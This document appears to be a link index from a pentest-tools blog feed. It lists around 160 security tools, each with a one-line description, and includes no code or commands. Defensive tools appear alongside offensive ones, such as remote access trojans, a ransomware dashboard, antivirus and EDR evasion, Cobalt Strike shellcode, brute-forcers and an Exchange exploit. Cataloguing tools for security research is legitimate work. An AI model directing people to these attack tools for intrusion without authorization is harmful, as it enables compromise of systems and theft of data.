- [Columbo - A Computer Forensic Analysis Tool Used To Simplify And Identify Specific Patterns In Compromised Datasets](http://feedproxy.google.com/~r/PentestTools/~3/9cMEG4O3F8k/columbo-computer-forensic-analysis-tool.html)
- [ThreatMapper - Identify Vulnerabilities In Running Containers, Images, Hosts And Repositories](http://feedproxy.google.com/~r/PentestTools/~3/BiBvHczRArU/threatmapper-identify-vulnerabilities.html)
- [Burpsuite-Copy-As-XMLHttpRequest - Copy As XMLHttpRequest BurpSuite Extension](http://feedproxy.google.com/~r/PentestTools/~3/2XaZXTffZYk/burpsuite-copy-as-xmlhttprequest-copy.html)
- [Scylla - The Simplistic Information Gathering Engine | Find Advanced Information On A Username, Website, Phone Number, Etc...](http://feedproxy.google.com/~r/PentestTools/~3/6dmn1FruDq8/scylla-simplistic-information-gathering.html)
- [UAC - Unix-like Artifacts Collector](http://feedproxy.google.com/~r/PentestTools/~3/Veu9pMiK9ss/uac-unix-like-artifacts-collector.html)
- [Maigret - OSINT Username Checker. Collect A Dossier On A Person By Username From A Huge Number Of Sites](http://feedproxy.google.com/~r/PentestTools/~3/XcgPG0Hh69k/maigret-osint-username-checker-collect.html)
- [Watson - Enumerate Missing KBs And Suggest Exploits For Useful Privilege Escalation Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/u_4d0hJ9YZk/watson-enumerate-missing-kbs-and.html)
- [SharpHound3 - C# Data Collector For The BloodHound Project](http://feedproxy.google.com/~r/PentestTools/~3/pvK-QgkYMTg/sharphound3-c-data-collector-for.html)
- [DefenderCheck - Identifies The Bytes That Microsoft Defender Flags On](http://feedproxy.google.com/~r/PentestTools/~3/1dKUnZJVw7U/defendercheck-identifies-bytes-that.html)
- [SharpGPOAbuse - Tool To Take Advantage Of A User'S Edit Rights On A Group Policy Object (GPO) In Order To Compromise The Objects That Are Controlled By That GPO](http://feedproxy.google.com/~r/PentestTools/~3/fB1_SUH4I_I/sharpgpoabuse-tool-to-take-advantage-of.html)
- [Tuf - A Framework For Securing Software Update Systems](http://feedproxy.google.com/~r/PentestTools/~3/D0YEys9Znwk/tuf-framework-for-securing-software.html)
- [SecretScanner - Find Secrets And Passwords In Container Images And File Systems](http://feedproxy.google.com/~r/PentestTools/~3/7-nzcRoC6M8/secretscanner-find-secrets-and.html)
- [SharpDPAPI - A C# Port Of Some Mimikatz DPAPI Functionality](http://feedproxy.google.com/~r/PentestTools/~3/nMwKDG7D_sY/sharpdpapi-c-port-of-some-mimikatz.html)
- [Seatbelt - A C# Project That Performs A Number Of Security Oriented Host-Survey "Safety Checks" Relevant From Both Offensive And Defensive Security Perspectives](http://feedproxy.google.com/~r/PentestTools/~3/9cXraSLqrJA/seatbelt-c-project-that-performs-number.html)
- [Rubeus - C# Toolset For Raw Kerberos Interaction And Abuses](http://feedproxy.google.com/~r/PentestTools/~3/Vt29L1RIWgw/rubeus-c-toolset-for-raw-kerberos.html)
- [InveighZero - Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 Spoofer/Man-In-The-Middle Tool](http://feedproxy.google.com/~r/PentestTools/~3/mUlseNw3gPA/inveighzero-windows-c.html)
- [ClearURLs - An Add-On Based On The New WebExtensions Technology And Will Automatically Remove Tracking Elements From URLs To Help Protect Your Privacy](http://feedproxy.google.com/~r/PentestTools/~3/KzrlYGs7iE4/clearurls-add-on-based-on-new.html)
- [Android_Hid - Use Android As Rubber Ducky Against Another Android Device](http://feedproxy.google.com/~r/PentestTools/~3/ATCWoFITtd8/androidhid-use-android-as-rubber-ducky.html)
- [KICS - Find Security Vulnerabilities, Compliance Issues, And Infrastructure Misconfigurations Early In The Development Cycle Of Your Infrastructure-As-Code](http://feedproxy.google.com/~r/PentestTools/~3/ozgYhfL1WGA/kics-find-security-vulnerabilities.html)
- [Boomerang - A Tool To Expose Multiple Internal Servers To Web/Cloud](http://feedproxy.google.com/~r/PentestTools/~3/mKsH_qSvBDQ/boomerang-tool-to-expose-multiple.html)
- [BadOutlook - (Kinda) Malicious Outlook Reader](http://feedproxy.google.com/~r/PentestTools/~3/KljwY8QU_AM/badoutlook-kinda-malicious-outlook.html)
- [CallObfuscator - Obfuscate Specific Windows Apis With Different APIs](http://feedproxy.google.com/~r/PentestTools/~3/JFhU0WlYOFA/callobfuscator-obfuscate-specific.html)
- [Search-That-Hash - Searches Hash APIs To Crack Your Hash Quickly, If Hash Is Not Found Automatically Pipes Into HashCat](http://feedproxy.google.com/~r/PentestTools/~3/yodgPu0QuJI/search-that-hash-searches-hash-apis-to.html)
- [Obfuscation_Detection - Collection Of Scripts To Pinpoint Obfuscated Code](http://feedproxy.google.com/~r/PentestTools/~3/UGycr92EPpQ/obfuscationdetection-collection-of.html)
- [cve_manager_VS - A Collection Of Python Apps And Shell Scripts To Email An Xlsx Spreadsheet Of New Vulnerabilities In The NIST CVE Database And Their Associated Products On A Daily Schedule](http://feedproxy.google.com/~r/PentestTools/~3/AW1ePPa2tPE/cvemanagervs-collection-of-python-apps.html)
- [Retoolkit - Reverse Engineer's Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/Yf4NMRTsBbg/retoolkit-reverse-engineers-toolkit.html)
- [Smogcloud - Find Cloud Assets That No One Wants Exposed](http://feedproxy.google.com/~r/PentestTools/~3/vsGf1vvSNZo/smogcloud-find-cloud-assets-that-no-one.html)
- [Gitrecon - OSINT Tool To Get Information From A Github Profile And Find GitHub User'S Email Addresses Leaked On Commits](http://feedproxy.google.com/~r/PentestTools/~3/XY0Mqt66esU/gitrecon-osint-tool-to-get-information.html)
- [OSCP-Exam-Report-Template-Markdown - Markdown Templates For Offensive Security OSCP, OSWE, OSCE, OSEE, OSWP Exam Report](http://feedproxy.google.com/~r/PentestTools/~3/p-9mCSAJz7k/oscp-exam-report-template-markdown.html)
- [Kraker - Distributed Password Brute-Force System That Focused On Easy Use](http://feedproxy.google.com/~r/PentestTools/~3/RmWdWwalGRw/kraker-distributed-password-brute-force.html)
- [CTF-Party - A Ruby Library To Enhance And Speed Up Script/Exploit Writing For CTF Players](http://feedproxy.google.com/~r/PentestTools/~3/O5dlqSjg484/ctf-party-ruby-library-to-enhance-and.html)
- [Godehashed - Tool That Uses The Dehashed.Com API To Search For Compromised Assets](http://feedproxy.google.com/~r/PentestTools/~3/nzxwpqbWdhc/godehashed-tool-that-uses-dehashedcom.html)
- [ProxyLogon - PoC Exploit for Microsoft Exchange](http://feedproxy.google.com/~r/PentestTools/~3/KSsW05WAoz4/proxylogon-poc-exploit-for-microsoft.html)
- [Netmap.Js - Fast Browser-Based Network Discovery Module](http://feedproxy.google.com/~r/PentestTools/~3/bGK8hPnb2-U/netmapjs-fast-browser-based-network.html)
- [Vajra - A Highly Customi zable Target And Scope Based Automated Web Hacking Framework To Automate Boring Recon Tasks](http://feedproxy.google.com/~r/PentestTools/~3/YQuf24DErSQ/vajra-highly-customi-zable-target-and.html)
- [Subcert - An Subdomain Enumeration Tool, That Finds All The Subdomains From Certificate Transparency Logs](http://feedproxy.google.com/~r/PentestTools/~3/AoO9qmBs93s/subcert-subdomain-enumeration-tool-that.html)
- [Mole - A Framework For Identifying And Exploiting Out-Of-Band Application Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/7I51Jqil_Ls/mole-framework-for-identifying-and.html)
- [Invoke-SocksProxy - Socks Proxy, And Reverse Socks Server Using Powershell](http://feedproxy.google.com/~r/PentestTools/~3/_FpEcFZ4sEA/invoke-socksproxy-socks-proxy-and.html)
- [Reverse-Shell-Generator - Hosted Reverse Shell Generator With A Ton Of Functionality](http://feedproxy.google.com/~r/PentestTools/~3/mpa1kJIbj2w/reverse-shell-generator-hosted-reverse.html)
- [OffensivePipeline - Tool To Download, Compile (Without Visual Studio) And Obfuscate C# Tools For Red Team Exercises](http://feedproxy.google.com/~r/PentestTools/~3/bifBNaBxpuU/offensivepipeline-tool-to-download.html)
- [Rafel-Rat - Android Rat Written In Java With WebPanel For Controlling Victims](http://feedproxy.google.com/~r/PentestTools/~3/bMMoyRB9IpU/rafel-rat-android-rat-written-in-java.html)
- [AnonX - An Encrypted File Transfer Via AES-256-CBC](http://feedproxy.google.com/~r/PentestTools/~3/eXmPteIPVsk/anonx-encrypted-file-transfer-via-aes.html)
- [Strafer - A Tool To Detect Potential Infections In Elasticsearch Instances](http://feedproxy.google.com/~r/PentestTools/~3/CuDUC6e4sy0/strafer-tool-to-detect-potential.html)
- [Turbo-Intruder - A Burp Suite Extension For Sending Large Numbers Of HTTP Requests And Analyzing The Results](http://feedproxy.google.com/~r/PentestTools/~3/qOe52cKAJ5c/turbo-intruder-burp-suite-extension-for.html)
- [Lazy-RDP - Script For AutomRDPatic Scanning And Brute-Force](http://feedproxy.google.com/~r/PentestTools/~3/TWRiQVRk6uE/lazy-rdp-script-for-automrdpatic.html)
- [SnitchDNS - Database Driven DNS Server With A Web UI](http://feedproxy.google.com/~r/PentestTools/~3/BrzaQB5W41Q/snitchdns-database-driven-dns-server.html)
- [Genisys - Powerful Telegram Members Scraping And Adding Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/KfQLlOR9ReE/genisys-powerful-telegram-members.html)
- [Confused - Tool To Check For Dependency Confusion Vulnerabilities In Multiple Package Management Systems](http://feedproxy.google.com/~r/PentestTools/~3/2h7xmIZlPK4/confused-tool-to-check-for-dependency.html)
- [DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking](http://feedproxy.google.com/~r/PentestTools/~3/q-lx7NjOcsM/dllhsc-dll-hijack-scanner-tool-to.html)
- [PowerSharpPack - Many usefull offensive CSharp Projects wraped into Powershell for easy usage](http://feedproxy.google.com/~r/PentestTools/~3/pAiCNnuQ5Zg/powersharppack-many-usefull-offensive.html)
- [Girsh - Automatically Spawn A Reverse Shell Fully Interactive](http://feedproxy.google.com/~r/PentestTools/~3/vLMd2d81TgI/girsh-automatically-spawn-reverse-shell.html)
- [HTTP Bridge - Send TCP Stream Packets Over Simple HTTP Request](http://feedproxy.google.com/~r/PentestTools/~3/_WTJncJX0PQ/http-bridge-send-tcp-stream-packets.html)
- [Gitls - Enumerate Git Repository URL From List Of URL / User / Org](http://feedproxy.google.com/~r/PentestTools/~3/qytOIm1XXdo/gitls-enumerate-git-repository-url-from.html)
- [Go-RouterSocks - Router Sock. One Port Socks For All The Others.](http://feedproxy.google.com/~r/PentestTools/~3/BzUdOcb_Mgw/go-routersocks-router-sock-one-port.html)
- [Writehat - A Pentest Reporting Tool Written In Python](http://feedproxy.google.com/~r/PentestTools/~3/VcHM-ZETelk/writehat-pentest-reporting-tool-written.html)
- [HiddenEyeReborn - HiddenEye With Completely New Codebase And Better Features Set](http://feedproxy.google.com/~r/PentestTools/~3/-JkqW8rzG0E/hiddeneyereborn-hiddeneye-with.html)
- [Sub404 - A Python Tool To Check Subdomain Takeover Vulnerability](http://feedproxy.google.com/~r/PentestTools/~3/MFIoyXYh5PA/sub404-python-tool-to-check-subdomain.html)
- [Procrustes - A Bash Script That Automates The Exfiltration Of Data Over Dns In Case We Have A Blind Command Execution On A Server Where All Outbound Connections Except DNS Are Blocked](http://feedproxy.google.com/~r/PentestTools/~3/dmok2LYP7s4/procrustes-bash-script-that-automates.html)
- [packetStrider - A Network Packet Forensics Tool For SSH](http://feedproxy.google.com/~r/PentestTools/~3/i4onsW8WMW8/packetstrider-network-packet-forensics.html)
- [Chameleon - Customizable Honeypots For Monitoring Network Traffic, Bots Activities And Username\Password Credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, STMP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres And MySQL)](http://feedproxy.google.com/~r/PentestTools/~3/xkvW-1zMDRc/chameleon-customizable-honeypots-for.html)
- [uEmu - Tiny Cute Emulator Plugin For IDA Based On Unicorn.](http://feedproxy.google.com/~r/PentestTools/~3/kNTpwW_nHVk/uemu-tiny-cute-emulator-plugin-for-ida.html)
- [Kubestriker - A Blazing Fast Security Auditing Tool For Kubernetes](http://feedproxy.google.com/~r/PentestTools/~3/wgftq32DR3M/kubestriker-blazing-fast-security.html)
- [CertEagle - Asset monitoring utility using real time CT log feeds](http://feedproxy.google.com/~r/PentestTools/~3/yJaE9YpxvMs/certeagle-asset-monitoring-utility.html)
- [PyBeacon - A Collection Of Scripts For Dealing With Cobalt Strike Beacons In Python](http://feedproxy.google.com/~r/PentestTools/~3/59IryS8U-UQ/pybeacon-collection-of-scripts-for.html)
- [SharpSphere - .NET Project For Attacking vCenter](http://feedproxy.google.com/~r/PentestTools/~3/yVuBsE6I7iI/sharpsphere-net-project-for-attacking.html)
- [Teatime - An RPC Attack Framework For Blockchain Nodes](http://feedproxy.google.com/~r/PentestTools/~3/PfpCuBhWMvo/teatime-rpc-attack-framework-for.html)
- [Threatspec - Continuous Threat Modeling, Through Code](http://feedproxy.google.com/~r/PentestTools/~3/qIY0AtpjsOg/threatspec-continuous-threat-modeling.html)
- [Fake-Sms - A Simple Command Line Tool Using Which You Can Skip Phone Number Based SMS Verification By Using A Temporary Phone Number That Acts Like A Proxy](http://feedproxy.google.com/~r/PentestTools/~3/U2sjI-SJPtw/fake-sms-simple-command-line-tool-using.html)
- [OWASP ASST (Automated Software Security Toolkit) - A Novel Open Source Web Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/WPtNQ_kfdrg/owasp-asst-automated-software-security.html)
- [Halogen - Automatically Create YARA Rules From Malicious Documents](http://feedproxy.google.com/~r/PentestTools/~3/VfOddCLFy5U/halogen-automatically-create-yara-rules.html)
- [StandIn - A Small .NET35/45 AD Post-Exploitation Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/KddAFq9VFNk/standin-small-net3545-ad-post.html)
- [WdToggle - A Beacon Object File (BOF) For Cobalt Strike Which Uses Direct System Calls To Enable WDigest Credential Caching](http://feedproxy.google.com/~r/PentestTools/~3/idAseaYLozU/wdtoggle-beacon-object-file-bof-for.html)
- [Gargamel - A Forensic Evidence Acquirer](http://feedproxy.google.com/~r/PentestTools/~3/0FHrGKlSFxU/gargamel-forensic-evidence-acquirer.html)
- [Pillager - Filesystems For Sensitive Information With Go](http://feedproxy.google.com/~r/PentestTools/~3/5nnxvF7zBJo/pillager-filesystems-for-sensitive.html)
- [Gatekeeper - First Open-Source DDoS Protection System](http://feedproxy.google.com/~r/PentestTools/~3/8IpbLqy9ohU/gatekeeper-first-open-source-ddos.html)
- [CornerShot - Amplify Network Visibility From Multiple POV Of Other Hosts](http://feedproxy.google.com/~r/PentestTools/~3/wqI9y3jUIR0/cornershot-amplify-network-visibility.html)
- [OpenWifiPass - An Open Source Implementation Of Apple's Wi-Fi Password Sharing Protocol In Python](http://feedproxy.google.com/~r/PentestTools/~3/zXwXcj2sPe4/openwifipass-open-source-implementation.html)
- [ScareCrow - Payload Creation Framework Designed Around EDR Bypass](http://feedproxy.google.com/~r/PentestTools/~3/CKq1OcSD8Uc/scarecrow-payload-creation-framework.html)
- [APT-Hunter - Threat Hunting Tool For Windows Event Logs Which Made By Purple Team Mindset To Provide Detect APT Movements Hidden In The Sea Of Windows Event Logs To Decrease The Time To Uncover Suspicious Activity](http://feedproxy.google.com/~r/PentestTools/~3/I7LH1j1n2kY/apt-hunter-threat-hunting-tool-for.html)
- [Kali Linux 2021.1 - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/d45kPR4G4RE/kali-linux-20211-penetration-testing.html)
- [BlackMamba - C2/post-exploitation Framework](http://feedproxy.google.com/~r/PentestTools/~3/QOGMYg2leeM/blackmamba-c2post-exploitation-framework.html)
- [BugBountyScanner - A Bash Script And Docker Image For Bug Bounty Reconnaissance](http://feedproxy.google.com/~r/PentestTools/~3/ZgW2sTTv_uw/bugbountyscanner-bash-script-and-docker.html)
- [HaE - BurpSuite Highlighter And Extractor](http://feedproxy.google.com/~r/PentestTools/~3/ksk5cabz_3U/hae-burpsuite-highlighter-and-extractor.html)
- [RAT-el - An Open Source Penetration Test Tool That Allows You To Take Control Of A Windows Machine](http://feedproxy.google.com/~r/PentestTools/~3/ltchIsC3fyI/rat-el-open-source-penetration-test.html)
- [Remote-Method-Guesser - Tool For Java RMI Enumeration And Bruteforce Of Remote Methods](http://feedproxy.google.com/~r/PentestTools/~3/_X1CD56wVBg/remote-method-guesser-tool-for-java-rmi.html)
- [Horusec - An Open Source Tool That Improves Identification Of Vulnerabilities In Your Project With Just One Command](http://feedproxy.google.com/~r/PentestTools/~3/2iOj-hDCy7U/horusec-open-source-tool-that-improves.html)
- [Perfusion - Exploit For The RpcEptMapper Registry Key Permissions Vulnerability (Windows 7 / 2088R2 / 8 / 2012)](http://feedproxy.google.com/~r/PentestTools/~3/u89wAuiKlHQ/perfusion-exploit-for-rpceptmapper.html)
- [PE-Packer - A Simple Windows X86 PE File Packer Written In C And Microsoft Assembly](http://feedproxy.google.com/~r/PentestTools/~3/k_gNbUl0Vks/pe-packer-simple-windows-x86-pe-file.html)
- [SSB - A Faster And Simpler Way To Bruteforce SSH Server](http://feedproxy.google.com/~r/PentestTools/~3/3wHpDiaMPhA/ssb-faster-and-simpler-way-to.html)
- [DirDar - A Tool That Searches For (403-Forbidden) Directories To Break It And Get Dir Listing On It](http://feedproxy.google.com/~r/PentestTools/~3/LR1v5oHVjIA/dirdar-tool-that-searches-for-403.html)
- [SSRFuzz - A Tool To Find Server Side Request Forgery Vulnerabilities, With CRLF Chaining Capabilities](http://feedproxy.google.com/~r/PentestTools/~3/7WsnF14u0Wg/ssrfuzz-tool-to-find-server-side.html)
- [Galer - A Fast Tool To Fetch URLs From HTML Attributes By Crawl-In](http://feedproxy.google.com/~r/PentestTools/~3/bhktcg8mqOk/galer-fast-tool-to-fetch-urls-from-html.html)
- [WireBug - A Toolset For Voice-over-IP Penetration Testing](http://feedproxy.google.com/~r/PentestTools/~3/IaWzkaPx7ow/wirebug-toolset-for-voice-over-ip.html)
- [Ghidra_Kernelcache - A Ghidra Framework For iOS Kernelcache Reverse Engineering](http://feedproxy.google.com/~r/PentestTools/~3/pgjsv_S6L_E/ghidrakernelcache-ghidra-framework-for.html)
- [CrackerJack - Web GUI for Hashcat](http://feedproxy.google.com/~r/PentestTools/~3/1MrynPby-_E/crackerjack-web-gui-for-hashcat.html)
- [Chimera - A (Shiny And Very Hack-Ish) PowerShell Obfuscation Script Designed To Bypass AMSI And Commercial Antivirus Solutions](http://feedproxy.google.com/~r/PentestTools/~3/N5Xg5VuGg1k/chimera-shiny-and-very-hack-ish.html)
- [Gitlab-Watchman - Monitoring GitLab For Sensitive Data Shared Publicly](http://feedproxy.google.com/~r/PentestTools/~3/I7PkJFkvl9Q/gitlab-watchman-monitoring-gitlab-for.html)
- [OSV - Open Source Vulnerability DB And Triage Service](http://feedproxy.google.com/~r/PentestTools/~3/nxw32-yH56Q/osv-open-source-vulnerability-db-and.html)
- [UDdup - Urls De-Duplication Tool For Better Recon](http://feedproxy.google.com/~r/PentestTools/~3/HojCVFlNJzA/uddup-urls-de-duplication-tool-for.html)
- [Damn-Vulnerable-GraphQL-Application - Damn Vulnerable GraphQL Application Is An Intentionally Vulnerable Implementation Of Facebook's GraphQL Technology, To Learn And Practice GraphQL Security](http://feedproxy.google.com/~r/PentestTools/~3/CiAB8rZHAN0/damn-vulnerable-graphql-application.html)
- [Project iKy v2.7.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface](http://feedproxy.google.com/~r/PentestTools/~3/ndDXcQpIHDY/project-iky-v270-tool-that-collects.html)
- [Darkdump - Search The Deep Web Straight From Your Terminal](http://feedproxy.google.com/~r/PentestTools/~3/M2SWIV-ruRg/darkdump-search-deep-web-straight-from.html)
- [Diceware-Password-Generator - Python Implementation Of The Diceware Password Generating Algorithm](http://feedproxy.google.com/~r/PentestTools/~3/H5KG5oN0mK4/diceware-password-generator-python.html)
- [BaphoDashBoard - Dashboard For Manage And Generate The Baphomet Ransomware](http://feedproxy.google.com/~r/PentestTools/~3/XrrVoD7xZ5g/baphodashboard-dashboard-for-manage-and.html)
- [XSSTRON - Electron JS Browser To Find XSS Vulnerabilities Automatically](http://feedproxy.google.com/~r/PentestTools/~3/Ec2VFBF6F34/xsstron-electron-js-browser-to-find-xss.html)
- [PatrowlHears - PatrowlHears - Vulnerability Intelligence Center / Exploits](http://feedproxy.google.com/~r/PentestTools/~3/0q8oyKkqxNs/patrowlhears-patrowlhears-vulnerability.html)
- [Patriot-Linux - Host IDS For Desktop Users](http://feedproxy.google.com/~r/PentestTools/~3/6wdwlF2PgLU/patriot-linux-host-ids-for-desktop-users.html)
- [ShellShockHunter - It's A Simple Tool For Test Vulnerability Shellshock](http://feedproxy.google.com/~r/PentestTools/~3/UpJhTqHbZLc/shellshockhunter-its-simple-tool-for.html)
- [Cypher - Crypto Cipher Encode Decode Hash](http://feedproxy.google.com/~r/PentestTools/~3/XvKqk0vnRfY/cypher-crypto-cipher-encode-decode-hash.html)
- [ATTPwn - Tool Designed To Emulate Adversaries](http://feedproxy.google.com/~r/PentestTools/~3/q32gGRq-0Ik/attpwn-tool-designed-to-emulate.html)
- [Wifi-Password - Quickly Fetch Your WiFi Password And If Needed, Generate A QR Code Of Your WiFi To Allow Phones To Easily Connect](http://feedproxy.google.com/~r/PentestTools/~3/QePC8wqJcJU/wifi-password-quickly-fetch-your-wifi.html)
- [Ditto - A Tool For IDN Homograph Attacks And Detection](http://feedproxy.google.com/~r/PentestTools/~3/gZcxPpRLVFU/ditto-tool-for-idn-homograph-attacks.html)
- [COM-Code-Helper - Two IDAPython Scripts Help You To Reconstruct Microsoft COM (Component Object Model) Code](http://feedproxy.google.com/~r/PentestTools/~3/4cujJxQYFDM/com-code-helper-two-idapython-scripts.html)
- [Creepy - A Geolocation OSINT Tool. Offers Geolocation Information Gathering Through Social Networking Platforms](http://feedproxy.google.com/~r/PentestTools/~3/Gr7HFsZ2gXM/creepy-geolocation-osint-tool-offers.html)
- [ExecuteAssembly - Load/Inject .NET Assemblies](http://feedproxy.google.com/~r/PentestTools/~3/hzE7NMxyf5Y/executeassembly-loadinject-net.html)
- [GPOZaurr - Group Policy Eater Is A PowerShell Module That Aims To Gather Information About Group Policies](http://feedproxy.google.com/~r/PentestTools/~3/7GyrrYLncvQ/gpozaurr-group-policy-eater-is.html)
- [Cloudlist - A Tool For Listing Assets From Multiple Cloud Providers](http://feedproxy.google.com/~r/PentestTools/~3/odS5FplXwUc/cloudlist-tool-for-listing-assets-from.html)
- [Geacon - Implement CobaltStrike's Beacon In Go](http://feedproxy.google.com/~r/PentestTools/~3/jvK9wB7oW2Y/geacon-implement-cobaltstrikes-beacon.html)
- [Satellite - Easy-To-Use Payload Hosting](http://feedproxy.google.com/~r/PentestTools/~3/o7rQ2uZCfyY/satellite-easy-to-use-payload-hosting.html)
- [Phpvuln - Audit Tool To Find Common Vulnerabilities In PHP Source Code](http://feedproxy.google.com/~r/PentestTools/~3/uNJicAWyV_s/phpvuln-audit-tool-to-find-common.html)
- [Linux-Chrome-Recon - An Information Gathering Tool Used To Enumerate All Possible Data About An User From Google-Chrome Browser From Any Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/MGydry24Cw4/linux-chrome-recon-information.html)
- [OpenCSPM - Open Cloud Security Posture Management Engine](http://feedproxy.google.com/~r/PentestTools/~3/11Y6QrwtI-k/opencspm-open-cloud-security-posture.html)
- [Uroboros - A GNU/Linux Monitoring And Profiling Tool Focused On Single Processes](http://feedproxy.google.com/~r/PentestTools/~3/C02XQeQyoLM/uroboros-gnulinux-monitoring-and.html)
- [BurpMetaFinder - Burp Suite Extension For Extracting Metadata From Files](http://feedproxy.google.com/~r/PentestTools/~3/4IU2nRjEkV0/burpmetafinder-burp-suite-extension-for.html)
- [Flawfinder - A Static Analysis Tool For Finding Vulnerabilities In C/C++ Source Code](http://feedproxy.google.com/~r/PentestTools/~3/J0luITnGVGo/flawfinder-static-analysis-tool-for.html)
- [Web-Brutator - Modular Web Interfaces Bruteforcer](http://feedproxy.google.com/~r/PentestTools/~3/cCovwslKw2Y/web-brutator-modular-web-interfaces.html)
- [MOSE - Post Exploitation Tool For Configuration Management Servers.](http://feedproxy.google.com/~r/PentestTools/~3/Qgk-XPAoY_U/mose-post-exploitation-tool-for.html)
- [OpenCVE - CVE Alerting Platform](http://feedproxy.google.com/~r/PentestTools/~3/NDGdP9iBgfo/opencve-cve-alerting-platform.html)
- [PSC - E2E Encryption For Multi-Hop Tty Sessions Or Portshells + TCP/UDP Port Forward](http://feedproxy.google.com/~r/PentestTools/~3/OxGUMR638Ec/psc-e2e-encryption-for-multi-hop-tty.html)
- [SSRF-King - SSRF Plugin For Burp Automates SSRF Detection In All Of The Request](http://feedproxy.google.com/~r/PentestTools/~3/SCmtwxFTsHc/ssrf-king-ssrf-plugin-for-burp.html)
- [CSSG - Cobalt Strike Shellcode Generator](http://feedproxy.google.com/~r/PentestTools/~3/ppc70r0UaOI/cssg-cobalt-strike-shellcode-generator.html)
- [Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux](http://feedproxy.google.com/~r/PentestTools/~3/xdcn42mgUxo/arbitrium-rat-cross-platform-fully.html)
- [JWT Key ID Injector - Simple Python Script To Check Against Hypothetical JWT Vulnerability](http://feedproxy.google.com/~r/PentestTools/~3/znDaDQ0xZhU/jwt-key-id-injector-simple-python.html)
- [Tritium - Password Spraying Framework](http://feedproxy.google.com/~r/PentestTools/~3/YwGhZPwMvts/tritium-password-spraying-framework.html)
- [SharpEDRChecker - Checks Running Processes, Process Metadata, DLLs Loaded Into Your Current Process And The Each DLLs Metadata, Common Inst all Directories, Installed Services And Each Service Binaries Metadata, Installed Drivers And Each Drivers Metadata, All For The Presence Of Known Defensive Products Such As AV's, EDR's And Logging Tools](http://feedproxy.google.com/~r/PentestTools/~3/lGjmCzrd14M/sharpedrchecker-checks-running.html)
- [Emba - An Analyzer For Linux-based Firmware Of Embedded Devices](http://feedproxy.google.com/~r/PentestTools/~3/jxh-VXIS_uY/emba-analyzer-for-linux-based-firmware.html)
- [Batea - AI-based, Context-Driven Network Device Ranking](http://feedproxy.google.com/~r/PentestTools/~3/OqJ3S2Je1T4/batea-ai-based-context-driven-network.html)
- [Duf - Disk Usage/Free Utility (Linux, BSD, macOS & Windows)](http://feedproxy.google.com/~r/PentestTools/~3/yS4EXUm-Bks/duf-disk-usagefree-utility-linux-bsd.html)
- [Shellex - C-shellcode To Hex Converter, Handy Tool For Paste And Execute Shellcodes In Gdb, Windbg, Radare2, Ollydbg, X64Dbg, Immunity Debugger And 010 Editor](http://feedproxy.google.com/~r/PentestTools/~3/v4uZhk1CGqw/shellex-c-shellcode-to-hex-converter.html)
- [Recon Simplified with Spyse](http://feedproxy.google.com/~r/PentestTools/~3/gZlaUhmDY-I/recon-simplified-with-spyse.html)
- [Recon Simplified with Spyse](http://feedproxy.google.com/~r/PentestTools/~3/gZlaUhmDY-I/recon-simplified-with-spyse.html)
- [WSuspicious - A Tool To Abuse Insecure WSUS Connections For Privilege Escalations](http://feedproxy.google.com/~r/PentestTools/~3/niAC2JllEmY/wsuspicious-tool-to-abuse-insecure-wsus.html)
- [ATMMalScan - Tool for Windows which helps to search for malware traces on an ATM during the DFIR process](http://feedproxy.google.com/~r/PentestTools/~3/g2iis8mwiH4/atmmalscan-tool-for-windows-which-helps.html)
- [Xnuspy - An iOS Kernel Function Hooking Framework For Checkra1N'Able Devices](http://feedproxy.google.com/~r/PentestTools/~3/7HpFfxxKZd4/xnuspy-ios-kernel-function-hooking.html)
- [Zmap - A Fast Single Packet Network Scanner Designed For Internet-wide Network Surveys](http://feedproxy.google.com/~r/PentestTools/~3/JWWnlkaSpDA/zmap-fast-single-packet-network-scanner.html)
- [Sigurlx - A Web Application Attack Surface Mapping Tool](http://feedproxy.google.com/~r/PentestTools/~3/QEtC4KY0lVI/sigurlx-web-application-attack-surface.html)
- [MetaFinder - Search For Documents In A Domain Through Google](http://feedproxy.google.com/~r/PentestTools/~3/zUmSA4k6of4/metafinder-search-for-documents-in.html)
- [WPCracker - WordPress User Enumeration And Login Brute Force Tool](http://feedproxy.google.com/~r/PentestTools/~3/SLRFCA5grUc/wpcracker-wordpress-user-enumeration.html)
- [CDK - Zero Dependency Container Penetration Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/ghyncCO0qqs/cdk-zero-dependency-container.html)
- [Reconftw - Simple Script For Full Recon](http://feedproxy.google.com/~r/PentestTools/~3/RFxkletXWIo/reconftw-simple-script-for-full-recon.html)
- [MobileHackersWeapons - Mobile Hacker's Weapons / A Collection Of Cool Tools Used By Mobile Hackers](http://feedproxy.google.com/~r/PentestTools/~3/oKmIKzGsibw/mobilehackersweapons-mobile-hackers.html)
- [Git-Wild-Hunt - A Tool To Hunt For Credentials In Github Wild AKA Git*Hunt](http://feedproxy.google.com/~r/PentestTools/~3/BbT_Jur4jU0/git-wild-hunt-tool-to-hunt-for.html)
- [HosTaGe - Low Interaction Mobile Honeypot](http://feedproxy.google.com/~r/PentestTools/~3/q7jGTsi3b70/hostage-low-interaction-mobile-honeypot.html)
- [BigBountyRecon - This Tool Utilises 58 Different Techniques To Expediate The Process Of Intial Reconnaissance On The Target Organisation](http://feedproxy.google.com/~r/PentestTools/~3/MQH6WSRvfMo/bigbountyrecon-this-tool-utilises-58.html)
- [Token-Hunter - Collect OSINT For GitLab Groups And Members And Search The Group And Group Members' Snippets, Issues, And Issue Discussions For Sensitive Data That May Be Included In These Assets](http://feedproxy.google.com/~r/PentestTools/~3/r-JQ_flZwOo/token-hunter-collect-osint-for-gitlab.html)
